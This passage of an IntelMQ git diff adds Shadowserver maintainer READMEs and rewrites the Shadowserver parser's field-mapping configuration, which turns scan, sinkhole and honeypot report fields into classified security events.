 * `types`: A list of strings or a string of comma-separated values with the names of report types you want to process. If you leave this empty, all the available reports will be downloaded and processed (i.e. 'scan', 'drones', 'intel', 'sandbox_connection', 'sinkhole_combined'). The possible report types are equivalent to the file names given in the section :ref:`Supported Reports <shadowserver-supported-reports>` of the Shadowserver parser.
 * **Cache parameters** (see in section :ref:`common-parameters`, the default TTL is set to 10 days)
 
diff --git a/intelmq/bots/collectors/shadowserver/README.md b/intelmq/bots/collectors/shadowserver/README.md
new file mode 100644
index 000000000..eb0ddfb4a
--- /dev/null
+++ b/intelmq/bots/collectors/shadowserver/README.md
@@ -0,0 +1,9 @@
+<!--
+SPDX-FileCopyrightText: 2022 The Shadowserver Foundation
+SPDX-License-Identifier: AGPL-3.0-or-later
+-->
+
+This module is maintained by [The Shadowserver Foundation](https://www.shadowserver.org/).  
+
+Please contact intelmq@shadowserver.org with any issues or concerns.
+
diff --git a/intelmq/bots/parsers/shadowserver/README.md b/intelmq/bots/parsers/shadowserver/README.md
new file mode 100644
index 000000000..eb0ddfb4a
--- /dev/null
+++ b/intelmq/bots/parsers/shadowserver/README.md
@@ -0,0 +1,9 @@
+<!--
+SPDX-FileCopyrightText: 2022 The Shadowserver Foundation
+SPDX-License-Identifier: AGPL-3.0-or-later
+-->
+
+This module is maintained by [The Shadowserver Foundation](https://www.shadowserver.org/).  
+
+Please contact intelmq@shadowserver.org with any issues or concerns.
+
diff --git a/intelmq/bots/parsers/shadowserver/_config.py b/intelmq/bots/parsers/shadowserver/_config.py
index 6a4521145..2cf2dfc0f 100644
--- a/intelmq/bots/parsers/shadowserver/_config.py
+++ b/intelmq/bots/parsers/shadowserver/_config.py
@@ -223,1432 +223,1466 @@ def force_base64(value: Optional[str]) -> Optional[str]:
         return value
 
 
-# https://www.shadowserver.org/wiki/pmwiki.php/Services/Open-DB2
-open_db2_discovery_service = {
-    'required_fields': [
-        ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
-        ('source.port', 'port')
-    ],
-    'optional_fields': [
-        ('protocol.transport', 'protocol'),
-        ('source.reverse_dns', 'hostname'),
-        ('source.asn', 'asn', invalidate_zero),
-        ('source.geolocation.cc', 'geo'),
-        ('source.geolocation.region', 'region'),
-        ('source.geolocation.city', 'city'),
-        ('extra.', 'db2_hostname', validate_to_none),
-        ('extra.', 'naics', invalidate_zero),
-        ('extra.', 'sic', invalidate_zero),
-        ('extra.', 'size', convert_int),
-        ('extra.', 'servername', validate_to_none),
-    ],
-    'constant_fields': {
-        'classification.taxonomy': 'vulnerable',
-        'classification.type': 'vulnerable-system',
-        'classification.identifier': 'open-db2-discovery-service',
-    }
-}
+def scan_exchange_taxonomy(field):
+    if field == 'exchange;webshell':
+        return 'intrusions'
+    return 'vulnerable'
 
-# https://www.shadowserver.org/what-we-do/network-reporting/vulnerable-http-report/
-# https://www.shadowserver.org/what-we-do/network-reporting/accessible-http-report/
-#
-# This mapping is for two feeds as they are the same, so we can use this mapping for
-# both :)
-#
-accessible_vulnerable_http = {
+
+def scan_exchange_type(field):
+    if field == 'exchange;webshell':
+        return 'system-compromise'
+    return 'infected-system'
+
+
+def scan_exchange_identifier(field):
+    if field == 'exchange;webshell':
+        return 'exchange-server-webshell'
+    return 'vulnerable-exchange-server'
+
+
+# BEGIN CONFGEN
+
+# https://www.shadowserver.org/what-we-do/network-reporting/blocklist-report/
+blocklist = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
-        ('source.port', 'port')
+        ('source.ip', 'ip', validate_ip),
     ],
     'optional_fields': [
-        ('protocol.transport', 'protocol'),
+        ('source.network', 'ip', validate_network),
+        ('extra.', 'tag', validate_to_none),
         ('source.reverse_dns', 'hostname'),
+        ('extra.', 'source', validate_to_none),
+        ('extra.', 'reason', validate_to_none),
         ('source.asn', 'asn', invalidate_zero),
         ('source.geolocation.cc', 'geo'),
         ('source.geolocation.region', 'region'),
         ('source.geolocation.city', 'city'),
-        ('extra.', 'tag'),
         ('extra.', 'naics', invalidate_zero),
         ('extra.', 'sic', invalidate_zero),
-        ('extra.', 'http', validate_to_none),
-        ('extra.', 'http_code', convert_int),
-        ('extra.', 'http_reason', validate_to_none),
-        ('extra.', 'content_type', validate_to_none),
-        ('extra.', 'connection', validate_to_none),
-        ('extra.', 'www_authenticate', validate_to_none),
-        ('extra.', 'set_cookie', validate_to_none),
-        ('extra.', 'server', validate_to_none),
-        ('extra.', 'content_length', invalidate_zero),
-        ('extra.', 'transfer_encoding', validate_to_none),
-        ('extra.', 'http_date', convert_date),
+        ('extra.', 'sector', validate_to_none),
     ],
     'constant_fields': {
+        'classification.identifier': 'blacklisted-ip',
         'classification.taxonomy': 'other',
-        'classification.type': 'other',
-        'classification.identifier': 'accessible-http',
-    }
+        'classification.type': 'blacklist',
+    },
 }
 
-# https://www.shadowserver.org/wiki/pmwiki.php/Services/Open-mDNS
-open_mdns = {
+# https://www.shadowserver.org/what-we-do/network-reporting/compromised-website-report/
+compromised_website = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
-        ('source.port', 'port'),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
-        ('protocol.transport', 'protocol'),
+        ('protocol.application', 'application', validate_to_none),
+        ('source.url', 'url', convert_http_host_and_url, True),
+        ('source.fqdn', 'http_host', validate_fqdn),
         ('source.reverse_dns', 'hostname'),
-        # ('classification.identifier', 'tag'),  # always set to 'open-mdns' in constant_fields
+        ('malware.name', 'tag'),
         ('source.asn', 'asn', invalidate_zero),
         ('source.geolocation.cc', 'geo'),
         ('source.geolocation.region', 'region'),
         ('source.geolocation.city', 'city'),
+        ('event_description.text', 'category', validate_to_none),
+        ('extra.', 'system', validate_to_none),
+        ('extra.', 'detected_since', validate_to_none),
+        ('extra.', 'server', validate_to_none),
+        ('extra.', 'redirect_target', validate_to_none),
         ('extra.', 'naics', invalidate_zero),
         ('extra.', 'sic', invalidate_zero),
-        ('extra.', 'mdns_name', validate_to_none),
-        ('extra.', 'mdns_ipv4', validate_to_none),
-        ('extra.', 'mdns_ipv6', validate_to_none),
-        ('extra.', 'services', validate_to_none),
-        ('extra.', 'workstation_name', validate_to_none),
-        ('extra.', 'workstation_ipv4', validate_to_none),
-        ('extra.', 'workstation_ipv6', validate_to_none),
-        ('extra.', 'workstation_info', validate_to_none),
-        ('extra.', 'http_name', validate_to_none),
-        ('extra.', 'http_ipv4', validate_to_none),
-        ('extra.', 'http_ipv6', validate_to_none),
-        ('extra.', 'http_ptr', validate_to_none),
-        ('extra.', 'http_info', validate_to_none),
-        ('extra.', 'http_target', validate_to_none),
-        ('extra.', 'http_port', validate_to_none),
+        ('extra.', 'sector', validate_to_none),
+        ('extra.', 'cc_url', validate_to_none),
+        ('extra.', 'family', validate_to_none),
     ],
     'constant_fields': {
-        'classification.taxonomy': 'vulnerable',
-        'classification.type': 'vulnerable-system',
-        'classification.identifier': 'open-mdns',
-        'protocol.application': 'mdns',
-    }
+        'classification.taxonomy': 'intrusions',
+        'classification.type': 'system-compromise',
+        'classification.identifier': 'compromised-website',
+    },
 }
 
-# https://www.shadowserver.org/wiki/pmwiki.php/Services/Open-Chargen
-open_chargen = {
+# https://www.shadowserver.org/what-we-do/network-reporting/device-identification-report/
+device_id = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
-        ('source.port', 'port'),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
         ('protocol.transport', 'protocol'),
         ('source.reverse_dns', 'hostname'),
-        # ('classification.identifier', 'tag'),  # always set to 'open-chargen' in constant_fields
+        ('extra.', 'tag', validate_to_none),
         ('source.asn', 'asn', invalidate_zero),
         ('source.geolocation.cc', 'geo'),
         ('source.geolocation.region', 'region'),
         ('source.geolocation.city', 'city'),
-        ('extra.response_size', 'size', convert_int),
         ('extra.', 'naics', invalidate_zero),
         ('extra.', 'sic', invalidate_zero),
         ('extra.', 'sector', validate_to_none),
+        ('extra.', 'device_vendor', validate_to_none),
+        ('extra.', 'device_type', validate_to_none),
+        ('extra.', 'device_model', validate_to_none),
     ],
     'constant_fields': {
-        'classification.taxonomy': 'vulnerable',
-        'classification.type': 'vulnerable-system',
-        'classification.identifier': 'open-chargen',
-        'protocol.application': 'chargen',
+        'classification.taxonomy': 'other',
+        'classification.type': 'undetermined',
+        'classification.identifier': 'device-id',
     },
 }
 
-# https://www.shadowserver.org/wiki/pmwiki.php/Services/Open-TFTP
-open_tftp = {
+# https://www.shadowserver.org/what-we-do/network-reporting/device-identification-report/
+device_id6 = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
-        ('source.port', 'port'),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
         ('protocol.transport', 'protocol'),
         ('source.reverse_dns', 'hostname'),
-        # ('classification.identifier', 'tag'),  # always set to 'open-tftp' in constant_fields
+        ('extra.', 'tag', validate_to_none),
         ('source.asn', 'asn', invalidate_zero),
         ('source.geolocation.cc', 'geo'),
         ('source.geolocation.region', 'region'),
         ('source.geolocation.city', 'city'),
-        ('extra.', 'naics', invalidate_zero),
-        ('extra.', 'sic', invalidate_zero),
-        ('extra.', 'size', convert_int),
-        ('extra.', 'opcode', validate_to_none),
-        ('extra.', 'errorcode', validate_to_none),
-        ('extra.', 'error', validate_to_none),
-        ('extra.', 'errormessage', validate_to_none),
+        ('extra.source.naics', 'naics', invalidate_zero),
+        ('extra.source.sic', 'sic', invalidate_zero),
+        ('extra.source.sector', 'sector', validate_to_none),
+        ('extra.', 'device_vendor', validate_to_none),
+        ('extra.', 'device_type', validate_to_none),
+        ('extra.', 'device_model', validate_to_none),
     ],
     'constant_fields': {
-        'classification.taxonomy': 'vulnerable',
-        'classification.type': 'vulnerable-system',
-        'classification.identifier': 'open-tftp',
-        'protocol.application': 'tftp',
+        'classification.taxonomy': 'other',
+        'classification.type': 'undetermined',
+        'classification.identifier': 'device-id',
     },
 }
 
-# https://www.shadowserver.org/wiki/pmwiki.php/Services/Sinkhole-HTTP-Drone
-# legacy (replaced by event46_sinkhole_http)
-sinkhole_http_drone = {
+# https://www.shadowserver.org/what-we-do/network-reporting/honeypot-brute-force-events-report/
+event_honeypot_brute_force = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
-        ('source.port', 'src_port'),
+        ('source.ip', 'src_ip', validate_ip),
+        ('source.port', 'src_port', convert_int),
     ],
     'optional_fields': [
-        ('source.asn', 'asn', invalidate_zero),
-        ('source.geolocation.cc', 'geo'),
-        ('destination.url', 'url', convert_http_host_and_url, True),
-        ('malware.name', 'type'),
-        ('user_agent', 'http_agent'),
-        ('source.tor_node', 'tor', set_tor_node),
-        ('os.name', 'p0f_genre'),
-        ('os.version', 'p0f_detail'),
-        ('source.reverse_dns', 'hostname'),
-        ('destination.port', 'dst_port'),
-        ('destination.fqdn', 'http_host', validate_fqdn),
-        ('extra.', 'http_referer', validate_to_none),
-        ('extra.', 'http_referer_ip', validate_ip),
-        ('extra.', 'http_referer_asn', convert_int),
-        ('extra.', 'http_referer_geo', validate_to_none),
+        ('classification.identifier', 'application'),
+        ('destination.account', 'username', validate_to_none),
+        ('extra.', 'tag', validate_to_none),
+        ('protocol.transport', 'protocol'),
+        ('source.asn', 'src_asn', invalidate_zero),
+        ('source.geolocation.cc', 'src_geo'),
+        ('source.geolocation.region', 'src_region'),
+        ('source.geolocation.city', 'src_city'),
+        ('source.reverse_dns', 'src_hostname'),
+        ('extra.source.naics', 'src_naics', invalidate_zero),
+        ('extra.source.sector', 'src_sector', validate_to_none),
+        ('extra.', 'device_vendor', validate_to_none),
+        ('extra.', 'device_type', validate_to_none),
+        ('extra.', 'device_model', validate_to_none),
         ('destination.ip', 'dst_ip', validate_ip),
+        ('destination.port', 'dst_port', convert_int),
         ('destination.asn', 'dst_asn', invalidate_zero),
         ('destination.geolocation.cc', 'dst_geo'),
-        ('extra.', 'naics', invalidate_zero),
-        ('extra.', 'sic', invalidate_zero),
-        ('extra.', 'http_referer_naics', validate_to_none),
-        ('extra.', 'http_referer_sic', validate_to_none),
-        ('extra.', 'sector', validate_to_none),
-        ('extra.', 'ssl_cipher', validate_to_none),
+        ('destination.geolocation.region', 'dst_region'),
+        ('destination.geolocation.city', 'dst_city'),
+        ('destination.reverse_dns', 'dst_hostname', validate_to_none),
+        ('extra.destination.naics', 'dst_naics', invalidate_zero),
+        ('extra.destination.sector', 'dst_sector', validate_to_none),
+        ('extra.', 'public_source', validate_to_none),
+        ('malware.name', 'infection'),
+        ('extra.', 'family', validate_to_none),
         ('extra.', 'application', validate_to_none),
         ('extra.', 'version', validate_to_none),
+        ('extra.', 'event_id', validate_to_none),
+        ('extra.', 'service', validate_to_none),
+        ('extra.', 'start_time', validate_to_none),
+        ('extra.', 'end_time', validate_to_none),
+        ('extra.', 'client_version', validate_to_none),
+        ('extra.', 'password', validate_to_none),
+        ('extra.', 'payload_url', validate_to_none),
+        ('extra.', 'payload_md5', validate_to_none),
     ],
     'constant_fields': {
-        'classification.taxonomy': 'malicious-code',
-        'classification.type': 'infected-system',
-        # classification.identifier will be set to (harmonized) malware name by modify expert
-        # The feed does not include explicit information on the protocol
-        # but since it is about HTTP the protocol is always set to 'tcp'.
-        'protocol.transport': 'tcp',
-        'protocol.application': 'http',
+        'classification.taxonomy': 'intrusion-attempts',
+        'classification.type': 'brute-force',
     },
 }
 
-# https://www.shadowserver.org/wiki/pmwiki.php/Services/Sinkhole6-HTTP-Drone
-# legacy (replaced by event46_sinkhole_http)
-ipv6_sinkhole_http_drone = {
+# https://www.shadowserver.org/what-we-do/network-reporting/honeypot-darknet-events-report/
+event_honeypot_darknet = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'src_ip'),
-        ('source.port', 'src_port')
+        ('source.ip', 'src_ip', validate_ip),
+        ('source.port', 'src_port', convert_int),
     ],
     'optional_fields': [
-        ('source.asn', 'src_asn'),
+        ('classification.identifier', 'tag', validate_to_none),
+        ('extra.', 'tag', validate_to_none),
+        ('protocol.transport', 'protocol'),
+        ('source.asn', 'src_asn', invalidate_zero),
         ('source.geolocation.cc', 'src_geo'),
         ('source.geolocation.region', 'src_region'),
+        ('source.geolocation.city', 'src_city'),
+        ('source.reverse_dns', 'src_hostname'),
+        ('extra.source.naics', 'src_naics', invalidate_zero),
+        ('extra.source.sector', 'src_sector', validate_to_none),
+        ('extra.', 'device_vendor', validate_to_none),
+        ('extra.', 'device_type', validate_to_none),
+        ('extra.', 'device_model', validate_to_none),
         ('destination.ip', 'dst_ip', validate_ip),
+        ('destination.port', 'dst_port', convert_int),
         ('destination.asn', 'dst_asn', invalidate_zero),
         ('destination.geolocation.cc', 'dst_geo'),
         ('destination.geolocation.region', 'dst_region'),
-        ('destination.port', 'dst_port'),
-        ('protocol.transport', 'protocol'),
-        ('malware.name', 'tag'),
-        ('source.reverse_dns', 'hostname'),
-        ('extra.', 'sysdesc', validate_to_none),
-        ('extra.', 'sysname', validate_to_none),
-        ('destination.url', 'http_url', convert_http_host_and_url, True),
-        ('extra.', 'http_agent', validate_to_none),
-        ('destination.fqdn', 'http_host'),
-        ('extra.', 'http_referer', validate_to_none),
-        ('extra.', 'http_referer_ip', validate_to_none),
-        ('extra.', 'http_referer_asn', validate_to_none),
-        ('extra.', 'http_referer_geo', validate_to_none),
-        ('extra.', 'http_referer_region', validate_to_none),
-        ('extra.', 'forwarded_by', validate_to_none),
+        ('destination.geolocation.city', 'dst_city'),
+        ('destination.reverse_dns', 'dst_hostname', validate_to_none),
+        ('extra.destination.naics', 'dst_naics', invalidate_zero),
+        ('extra.destination.sector', 'dst_sector', validate_to_none),
+        ('extra.', 'public_source', validate_to_none),
+        ('malware.name', 'infection'),
+        ('extra.', 'family', validate_to_none),
+        ('extra.', 'application', validate_to_none),
+        ('extra.', 'version', validate_to_none),
+        ('extra.', 'event_id', validate_to_none),
+        ('extra.', 'count', convert_int),
     ],
     'constant_fields': {
-        'classification.taxonomy': 'malicious-code',
-        'classification.type': 'infected-system',
-        # classification.identifier will be set to (harmonized) malware name by modify expert
-        # The feed does not include explicit information on the protocol
-        # but since it is about HTTP the protocol is always set to 'tcp'.
-        'protocol.transport': 'tcp',
+        'classification.taxonomy': 'other',
+        'classification.type': 'other',
     },
 }
 
-# https://www.shadowserver.org/wiki/pmwiki.php/Services/Microsoft-Sinkhole
-# legacy (replaced by event46_sinkhole_http)
-microsoft_sinkhole = {
+# https://www.shadowserver.org/what-we-do/network-reporting/honeypot-ddos-events/
+event_honeypot_ddos = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
-        ('source.port', 'src_port'),
+        ('source.ip', 'src_ip', validate_ip),
+        ('source.port', 'src_port', convert_int),
     ],
     'optional_fields': [
-        ('source.asn', 'asn', invalidate_zero),
-        ('source.geolocation.cc', 'geo'),
-        ('destination.url', 'url', convert_http_host_and_url, True),
-        ('malware.name', 'type'),
-        ('source.tor_node', 'tor', set_tor_node),
-        ('os.name', 'p0f_genre'),
-        ('os.version', 'p0f_detail'),
-        ('source.reverse_dns', 'hostname'),
-        ('destination.port', 'dst_port'),
-        ('destination.fqdn', 'http_host', validate_fqdn),
-        ('extra.', 'http_agent', validate_to_none),
-        ('extra.', 'http_referer', validate_to_none),
-        ('extra.', 'http_referer_ip', validate_ip),
-        ('extra.', 'http_referer_asn', convert_int),
-        ('extra.', 'http_referer_geo', validate_to_none),
+        ('extra.', 'duration', convert_int),
+        ('extra.', 'attack_src_port', convert_int),
+        ('extra.', 'http_usessl', convert_bool),
+        ('extra.', 'ip_header_seqnum', convert_int),
+        ('extra.', 'ip_header_ttl', convert_int),
+        ('extra.', 'number_of_connections', convert_int),
+        ('extra.', 'packet_length', convert_int),
+        ('extra.', 'packet_randomized', convert_bool),
+        ('extra.', 'tag', validate_to_none),
+        ('protocol.transport', 'protocol'),
+        ('source.asn', 'src_asn', invalidate_zero),
+        ('source.geolocation.cc', 'src_geo'),
+        ('source.geolocation.region', 'src_region'),
+        ('source.geolocation.city', 'src_city'),
+        ('source.reverse_dns', 'src_hostname'),
+        ('extra.source.naics', 'src_naics', invalidate_zero),
+        ('extra.source.sector', 'src_sector', validate_to_none),
+        ('extra.', 'device_vendor', validate_to_none),
+        ('extra.', 'device_type', validate_to_none),
+        ('extra.', 'device_model', validate_to_none),
         ('destination.ip', 'dst_ip', validate_ip),
+        ('destination.port', 'dst_port', convert_int),
         ('destination.asn', 'dst_asn', invalidate_zero),
         ('destination.geolocation.cc', 'dst_geo'),
-        ('extra.', 'naics', invalidate_zero),
-        ('extra.', 'sic', invalidate_zero),
-        ('extra.', 'http_referer_naics', invalidate_zero),
-        ('extra.', 'http_referer_sic', invalidate_zero),
-        ('extra.', 'sector', validate_to_none),
-        ('extra.', 'ssl_cipher', validate_to_none),
+        ('destination.geolocation.region', 'dst_region'),
+        ('destination.geolocation.city', 'dst_city'),
+        ('destination.reverse_dns', 'dst_hostname', validate_to_none),
+        ('extra.destination.naics', 'dst_naics', invalidate_zero),
+        ('extra.destination.sector', 'dst_sector', validate_to_none),
+        ('extra.', 'domain_source', validate_to_none),
+        ('extra.', 'public_source', validate_to_none),
+        ('malware.name', 'infection'),
+        ('extra.', 'family', validate_to_none),
         ('extra.', 'application', validate_to_none),
         ('extra.', 'version', validate_to_none),
+        ('extra.', 'event_id', validate_to_none),
+        ('extra.', 'dst_network', validate_to_none),
+        ('extra.', 'dst_netmask', validate_to_none),
+        ('extra.', 'attack', validate_to_none),
+        ('extra.', 'attack_src_ip', validate_to_none),
+        ('extra.', 'domain', validate_to_none),
+        ('extra.', 'domain_transaction_id', validate_to_none),
+        ('extra.', 'gcip', validate_to_none),
+        ('extra.', 'http_method', validate_to_none),
+        ('extra.', 'http_path', validate_to_none),
+        ('extra.', 'http_postdata', validate_to_none),
+        ('extra.', 'ip_header_ack', validate_to_none),
+        ('extra.', 'ip_header_acknum', validate_to_none),
+        ('extra.', 'ip_header_dont_fragment', validate_to_none),
+        ('extra.', 'ip_header_fin', validate_to_none),
+        ('extra.', 'ip_header_identity', validate_to_none),
+        ('extra.', 'ip_header_psh', validate_to_none),
+        ('extra.', 'ip_header_rst', validate_to_none),
+        ('extra.', 'ip_header_syn', validate_to_none),
+        ('extra.', 'ip_header_tos', validate_to_none),
+        ('extra.', 'ip_header_urg', validate_to_none),
     ],
     'constant_fields': {
-        'classification.taxonomy': 'malicious-code',
-        'classification.type': 'infected-system',
-        # classification.identifier will be set to (harmonized) malware name by modify expert
-        'protocol.transport': 'tcp',
-        'protocol.application': 'http',
+        'classification.taxonomy': 'availability',
+        'classification.type': 'ddos',
+        'classification.identifier': 'honeypot-ddos',
     },
 }
 
-# https://www.shadowserver.org/wiki/pmwiki.php/Services/Open-Redis
-open_redis = {
+# https://www.shadowserver.org/what-we-do/network-reporting/honeypot-amplification-ddos-events-report/
+event_honeypot_ddos_amp = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
-        ('source.port', 'port'),
+        ('source.ip', 'src_ip', validate_ip),
+        ('source.port', 'src_port', convert_int),
     ],
     'optional_fields': [
+        ('extra.', 'end_time', convert_date_utc),
+        ('extra.', 'avg_pps', convert_float),
+        ('extra.', 'max_pps', convert_float),
+        ('extra.', 'tag', validate_to_none),
         ('protocol.transport', 'protocol'),
-        ('source.reverse_dns', 'hostname'),
-        # ('classification.identifier', 'tag'),  # always set to 'open-redis' in constant_fields
+        ('source.asn', 'src_asn', invalidate_zero),
+        ('source.geolocation.cc', 'src_geo'),
+        ('source.geolocation.region', 'src_region'),
+        ('source.geolocation.city', 'src_city'),
+        ('source.reverse_dns', 'src_hostname'),
+        ('extra.source.naics', 'src_naics', invalidate_zero),
+        ('extra.source.sector', 'src_sector', validate_to_none),
+        ('extra.', 'device_vendor', validate_to_none),
+        ('extra.', 'device_type', validate_to_none),
+        ('extra.', 'device_model', validate_to_none),
+        ('destination.ip', 'dst_ip', validate_ip),
+        ('destination.port', 'dst_port', convert_int),
+        ('destination.asn', 'dst_asn', invalidate_zero),
+        ('destination.geolocation.cc', 'dst_geo'),
+        ('destination.geolocation.region', 'dst_region'),
+        ('destination.geolocation.city', 'dst_city'),
+        ('destination.reverse_dns', 'dst_hostname', validate_to_none),
+        ('extra.destination.naics', 'dst_naics', invalidate_zero),
+        ('extra.destination.sector', 'dst_sector', validate_to_none),
+        ('extra.', 'public_source', validate_to_none),
+        ('malware.name', 'infection'),
+        ('extra.', 'family', validate_to_none),
+        ('extra.', 'application', validate_to_none),
         ('extra.', 'version', validate_to_none),
-        ('source.asn', 'asn', invalidate_zero),
-        ('source.geolocation.cc', 'geo'),
-        ('source.geolocation.region', 'region'),
-        ('source.geolocation.city', 'city'),
-        ('extra.', 'naics', invalidate_zero),
-        ('extra.', 'sic', invalidate_zero),
-        ('extra.', 'git_sha1', validate_to_none),
-        ('extra.', 'git_dirty_flag', validate_to_none),
-        ('extra.', 'build_id', validate_to_none),
-        ('extra.', 'mode', validate_to_none),
-        ('extra.os.name', 'os', validate_to_none),
-        ('extra.', 'architecture', validate_to_none),
-        ('extra.', 'multiplexing_api', validate_to_none),
-        ('extra.', 'gcc_version', validate_to_none),
-        ('extra.', 'process_id', validate_to_none),
-        ('extra.', 'run_id', validate_to_none),
-        ('extra.', 'uptime', validate_to_none),
-        ('extra.', 'connected_clients', validate_to_none),
-        ('extra.', 'sector', validate_to_none),
+        ('extra.', 'event_id', validate_to_none),
+        ('extra.', 'request', validate_to_none),
+        ('extra.', 'count', convert_int),
+        ('extra.', 'bytes', convert_int),
+        ('extra.', 'duration', validate_to_none),
     ],
     'constant_fields': {
-        'classification.taxonomy': 'vulnerable',
-        'classification.type': 'vulnerable-system',
-        'classification.identifier': 'open-redis',
-        'protocol.application': 'redis',
+        'classification.identifier': 'amplification-ddos-victim',
+        'classification.taxonomy': 'availability',
+        'classification.type': 'ddos',
     },
 }
 
-# https://www.shadowserver.org/wiki/pmwiki.php/Services/Open-Portmapper
-open_portmapper = {
+# https://www.shadowserver.org/what-we-do/network-reporting/honeypot-ddos-target-events-report/
+event_honeypot_ddos_target = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
-        ('source.port', 'port'),
+        ('source.ip', 'src_ip', validate_ip),
+        ('source.port', 'src_port', convert_int),
     ],
     'optional_fields': [
+        ('extra.', 'duration', convert_int),
+        ('extra.', 'attack_src_port', convert_int),
+        ('extra.', 'http_usessl', convert_bool),
+        ('extra.', 'ip_header_seqnum', convert_int),
+        ('extra.', 'ip_header_ttl', convert_int),
+        ('extra.', 'number_of_connections', convert_int),
+        ('extra.', 'packet_length', convert_int),
+        ('extra.', 'packet_randomized', convert_bool),
+        ('extra.', 'tag', validate_to_none),
         ('protocol.transport', 'protocol'),
-        ('source.reverse_dns', 'hostname'),
-        # ('classification.identifier', 'tag'),  # always set to 'open-portmapper' in constant_fields
-        ('source.asn', 'asn', invalidate_zero),
-        ('source.geolocation.cc', 'geo'),
-        ('source.geolocation.region', 'region'),
-        ('source.geolocation.city', 'city'),
-        ('extra.', 'naics', invalidate_zero),
-        ('extra.', 'sic', invalidate_zero),
-        ('extra.', 'programs', validate_to_none),
-        ('extra.', 'mountd_port', validate_to_none),
-        ('extra.', 'exports', validate_to_none),
-        ('extra.', 'sector', validate_to_none),
+        ('destination.ip', 'dst_ip', validate_ip),
+        ('destination.port', 'dst_port', convert_int),
+        ('destination.asn', 'dst_asn', invalidate_zero),
+        ('destination.geolocation.cc', 'dst_geo'),
+        ('destination.geolocation.region', 'dst_region'),
+        ('destination.geolocation.city', 'dst_city'),
+        ('destination.reverse_dns', 'dst_hostname', validate_to_none),
+        ('extra.destination.naics', 'dst_naics', invalidate_zero),
+        ('extra.destination.sector', 'dst_sector', validate_to_none),
+        ('extra.', 'device_vendor', validate_to_none),
+        ('extra.', 'device_type', validate_to_none),
+        ('extra.', 'device_model', validate_to_none),
+        ('source.asn', 'src_asn', invalidate_zero),
+        ('source.geolocation.cc', 'src_geo'),
+        ('source.geolocation.region', 'src_region'),
+        ('source.geolocation.city', 'src_city'),
+        ('source.reverse_dns', 'src_hostname'),
+        ('extra.source.naics', 'src_naics', invalidate_zero),
+        ('extra.source.sector', 'src_sector', validate_to_none),
+        ('extra.', 'domain_source', validate_to_none),
+        ('extra.', 'public_source', validate_to_none),
+        ('malware.name', 'infection'),
+        ('extra.', 'family', validate_to_none),
+        ('extra.', 'application', validate_to_none),
+        ('extra.', 'version', validate_to_none),
+        ('extra.', 'event_id', validate_to_none),
+        ('extra.', 'dst_network', validate_to_none),
+        ('extra.', 'dst_netmask', validate_to_none),
+        ('extra.', 'attack', validate_to_none),
+        ('extra.', 'attack_src_ip', validate_to_none),
+        ('extra.', 'domain', validate_to_none),
+        ('extra.', 'domain_transaction_id', validate_to_none),
+        ('extra.', 'gcip', validate_to_none),
+        ('extra.', 'http_method', validate_to_none),
+        ('extra.', 'http_path', validate_to_none),
+        ('extra.', 'http_postdata', validate_to_none),
+        ('extra.', 'ip_header_ack', validate_to_none),
+        ('extra.', 'ip_header_acknum', validate_to_none),
+        ('extra.', 'ip_header_dont_fragment', validate_to_none),
+        ('extra.', 'ip_header_fin', validate_to_none),
+        ('extra.', 'ip_header_identity', validate_to_none),
+        ('extra.', 'ip_header_psh', validate_to_none),
+        ('extra.', 'ip_header_rst', validate_to_none),
+        ('extra.', 'ip_header_syn', validate_to_none),
+        ('extra.', 'ip_header_tos', validate_to_none),
+        ('extra.', 'ip_header_urg', validate_to_none),
     ],
     'constant_fields': {
-        'classification.taxonomy': 'vulnerable',
-        'classification.type': 'vulnerable-system',
-        'classification.identifier': 'open-portmapper',
-        'protocol.application': 'portmapper',
+        'classification.taxonomy': 'availability',
+        'classification.type': 'ddos',
+        'classification.identifier': 'honeypot-ddos-target',
     },
 }
 
-# https://www.shadowserver.org/wiki/pmwiki.php/Services/Open-IPMI
-open_ipmi = {
+# https://www.shadowserver.org/what-we-do/network-reporting/honeypot-http-scanner-events/
+event_honeypot_http_scan = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
-        ('source.port', 'port'),
+        ('source.ip', 'src_ip', validate_ip),
+        ('source.port', 'src_port', convert_int),
     ],
     'optional_fields': [
-        ('source.reverse_dns', 'hostname'),
-        # ('classification.identifier', 'tag'),  # always set to 'open-ipmi' in constant_fields
-        ('extra.', 'ipmi_version', validate_to_none),
-        ('source.asn', 'asn', invalidate_zero),
-        ('source.geolocation.cc', 'geo'),
-        ('source.geolocation.region', 'region'),
-        ('source.geolocation.city', 'city'),
-        ('extra.', 'none_auth', convert_bool),
-        ('extra.', 'md2_auth', convert_bool),
-        ('extra.', 'md5_auth', convert_bool),
-        ('extra.', 'passkey_auth', convert_bool),
-        ('extra.', 'oem_auth', convert_bool),
-        ('extra.', 'defaultkg', validate_to_none),
-        ('extra.', 'permessage_auth', convert_bool),
-        ('extra.', 'userlevel_auth', convert_bool),
-        ('extra.', 'usernames', convert_bool),
-        ('extra.', 'nulluser', convert_bool),
-        ('extra.', 'anon_login', convert_bool),
-        ('extra.', 'error', validate_to_none),
-        ('extra.', 'deviceid', validate_to_none),
-        ('extra.', 'devicerev', validate_to_none),
-        ('extra.', 'firmwarerev', validate_to_none),
